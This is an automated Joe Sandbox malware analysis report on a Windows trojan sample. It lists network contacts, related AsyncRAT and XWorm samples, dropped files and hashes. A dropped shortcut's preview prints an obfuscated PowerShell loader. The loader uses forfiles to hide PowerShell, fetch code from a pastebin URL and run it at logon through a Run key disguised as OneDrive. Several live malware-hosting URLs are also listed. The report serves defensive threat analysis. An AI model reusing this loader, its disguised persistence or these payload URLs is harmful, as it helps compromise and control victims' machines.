                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1650878851.0000019380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B2F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.00000215141ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B751DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://pastebin.compowershell.exe, 00000007.00000002.1650878851.0000019381628000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B456C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758B5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.000002151474A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B752286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://pastebin.compowershell.exe, 0000000D.00000002.1652165646.0000024758B3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514BF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                104.20.3.235
                                                                		pastebin.comUnited States
                                                                		13335CLOUDFLARENETUStrue
                                                                185.199.109.133
                                                                		raw.githubusercontent.comNetherlands
                                                                		54113FASTLYUStrue
                                                                104.18.111.161
                                                                		tinyurl.comUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                162.159.128.233
                                                                		discord.comUnited States
                                                                		13335CLOUDFLARENETUStrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1534111
                                                                Start date and time:2024-10-15 15:58:56 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 43s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:29
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:5UIy3bo46y.dll
                                                                (renamed file extension from exe to dll, renamed because original name is a hash value)
                                                                Original Sample Name:0b9acce9a60dda0df4fdc61eb954433a5bff023ab04e38aca2c2f18aad70c3f3.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winDLL@37/19@7/4
                                                                EGA Information:
                                                                • Successful, ratio: 50%
                                                                HCA Information:
                                                                • Successful, ratio: 69%
                                                                • Number of executed functions: 14
                                                                • Number of non-executed functions: 1

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 20.101.57.9, 13.95.65.251
                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 6448 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • VT rate limit hit for: 5UIy3bo46y.dll

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                10:00:06API Interceptor1x Sleep call for process: loaddll64.exe modified
                                                                10:00:08API Interceptor1000x Sleep call for process: powershell.exe modified
                                                                16:00:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                16:00:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                104.20.3.235Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                • pastebin.com/raw/sA04Mwk2
                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                • pastebin.com/raw/sA04Mwk2
                                                                sostener.vbsGet hashmaliciousNjratBrowse
                                                                • pastebin.com/raw/V9y5Q5vv
                                                                SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                                • pastebin.com/raw/V9y5Q5vv
                                                                sostener.vbsGet hashmaliciousRemcosBrowse
                                                                • pastebin.com/raw/V9y5Q5vv
                                                                New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                                • pastebin.com/raw/NsQ5qTHr
                                                                Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                                                • pastebin.com/raw/NsQ5qTHr
                                                                2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                                                                • pastebin.com/raw/NsQ5qTHr
                                                                PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                • pastebin.com/raw/NsQ5qTHr
                                                                185.199.109.133OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                tinyurl.comBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                • 104.18.111.161
                                                                https://tinyurl.com/y9r5fvasGet hashmaliciousUnknownBrowse
                                                                • 104.17.112.233
                                                                https://tinyurl.com/5xa2ubd7Get hashmaliciousUnknownBrowse
                                                                • 104.17.112.233
                                                                SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                • 104.17.112.233
                                                                SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                • 104.17.112.233
                                                                SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                • 104.18.111.161
                                                                balcao242609.vbsGet hashmaliciousUnknownBrowse
                                                                • 104.18.111.161
                                                                https://ibafhfg.r.af.d.sendibt2.com/tr/cl/ei-iIasDUfhajlha_L_PYwmEV0TXG-pmymM0mqP6wJ8jqUBnRevpHf8umV1Cxk0P5A0G7qvQoF39O-oYwRH3RCdSdtx1Y0b_2sg_iXOax_tFc1XZBC3EPtztmZF7qOstNWb2r9nSAsjPU6qj2F8Gg64Ba0d6xBjSEwUcsnsTYaQjAxsh52QvEBY0E7yDJkW8hVMf4Z-UgTv6SrNDoDPMdYdSSvXdtLzPyBKNyGRyOKbA6kM2yCjc-39_2GjmQrGc8IG-6EqDH4Ly9S8KIsAGet hashmaliciousUnknownBrowse
                                                                • 104.17.112.233
                                                                http://tinyurl.com/fresn30d39dGet hashmaliciousUnknownBrowse
                                                                • 104.17.112.233
                                                                https://tinyurl.com/NDCEuropeGet hashmaliciousUnknownBrowse
                                                                • 104.18.111.161
                                                                discord.comLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.138.232
                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                • 162.159.138.232
                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.138.232
                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                • 162.159.137.232
                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                • 162.159.137.232
                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                • 162.159.135.232
                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.138.232
                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                • 162.159.138.232
                                                                Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.135.232
                                                                Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.136.232

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUSLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.138.232
                                                                gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                • 172.67.19.24
                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                • 162.159.138.232
                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.138.232
                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                • 104.18.111.161
                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                • 162.159.137.232
                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                • 162.159.135.232
                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.138.232
                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                • 162.159.138.232
                                                                HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                • 104.27.206.92
                                                                CLOUDFLARENETUSLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.138.232
                                                                gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                • 172.67.19.24
                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                • 162.159.138.232
                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.138.232
                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                • 104.18.111.161
                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                • 162.159.137.232
                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                • 162.159.135.232
                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.138.232
                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                • 162.159.138.232
                                                                HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                • 104.27.206.92
                                                                FASTLYUSLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                • 185.199.111.133
                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                • 185.199.111.133
                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                • 185.199.109.133
                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                • 185.199.111.133
                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                • 185.199.108.133
                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                • 185.199.110.133
                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                • 185.199.111.133
                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                • 185.199.108.133
                                                                https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                • 151.101.1.229
                                                                na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 185.199.109.133

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0eLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                • 104.20.3.235
                                                                • 185.199.109.133
                                                                • 162.159.128.233
                                                                gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                • 104.20.3.235
                                                                • 185.199.109.133
                                                                • 162.159.128.233
                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                • 104.20.3.235
                                                                • 185.199.109.133
                                                                • 162.159.128.233
                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                • 104.20.3.235
                                                                • 185.199.109.133
                                                                • 162.159.128.233
                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                • 104.20.3.235
                                                                • 185.199.109.133
                                                                • 162.159.128.233
                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                • 104.20.3.235
                                                                • 185.199.109.133
                                                                • 162.159.128.233
                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                • 104.20.3.235
                                                                • 185.199.109.133
                                                                • 162.159.128.233
                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                • 104.20.3.235
                                                                • 185.199.109.133
                                                                • 162.159.128.233
                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                • 104.20.3.235
                                                                • 185.199.109.133
                                                                • 162.159.128.233
                                                                https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.20.3.235
                                                                • 185.199.109.133
                                                                • 162.159.128.233

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                Category:dropped
                                                                Size (bytes):1728
                                                                Entropy (8bit):4.527272298423835
                                                                Encrypted:false
                                                                SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                MD5:724AA21828AD912CB466E3B0A79F478B
                                                                SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                Malicious:true
                                                                Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):11608
                                                                Entropy (8bit):4.890472898059848
                                                                Encrypted:false
                                                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                Malicious:false
                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:Nlllula/L:NllUa/
                                                                MD5:007169766845EC5A2BD6BD299E76CB51
                                                                SHA1:512122CA3553CEAEB92B26F864DBF34D65318F46
                                                                SHA-256:D5D8FC318BB03710293754D82EEBA8FBA87DA20E06A077379D05021F53EEDCFA
                                                                SHA-512:E1E61D589789A166DD54BB73E327337343C161BE61907D02CC9859BFEDFC310467C8CB0678E0CBAD2BA38E887C8855914579CAB66DAB1B481EBF92C8EA7601A8
                                                                Malicious:false
                                                                Preview:@...e...............................R................@..........

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nxjdd0c.uef.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2iuhbbzx.5dv.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jalsbmk.duw.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30iiyu11.f0m.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mk35nbp.5hg.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_byh5kfop.ek2.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cssvctxn.cta.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ct53w0vm.0ha.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0ssse3z.hpo.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
